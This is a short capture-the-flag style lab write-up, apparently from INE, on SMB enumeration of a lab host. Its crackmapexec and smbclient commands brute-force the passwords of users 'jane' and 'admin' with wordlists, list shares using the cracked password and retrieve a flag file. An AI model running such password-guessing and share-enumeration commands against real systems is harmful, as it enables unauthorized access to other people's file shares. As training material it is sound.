Samba Recon: Dictionary Attack

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Answer the following questions:

1. What is the password of user “jane” required to access share “jane”? Use smb_login metasploit module with password wordlist /usr/share/wordlists/metasploit/unix_passwords.txt

2. What is the password of user “admin” required to access share “admin”? Use hydra with password wordlist: /usr/share/wordlists/rockyou.txt

3. Which share is read only? Use smbmap with credentials obtained in question 2.

4. Is share “jane” browseable? Use credentials obtained from the 1st question.

5. Fetch the flag from share “admin”

6. List the named pipes available over SMB on the samba server? Use pipe_auditor metasploit module with credentials obtained from question 2.

7. List sid of Unix users shawn, jane, nancy and admin respectively by performing RID cycling using enum4Linux with credentials obtained in question 2.

Tools

• Smbmap

• Metasploit Framework

• enum4Linux

• smbclient

• Hydra

Writeup

crackmapexec smb demo.ine.local -u jane -p /usr/share/wordlists/metasploit/unix_passwords.txt

crackmapexec smb demo.ine.local -u admin -p /usr/share/wordlists/metasploit/unix_passwords.txt

crackmapexec smb demo.ine.local -u admin -p password1 --shares

smbclient -U admin //demo.ine.local/admin
password1
cd hidden
get flag.tar.gz
exit
gunzip flag.tar.gz
tar -xvf flag.tar
cat falg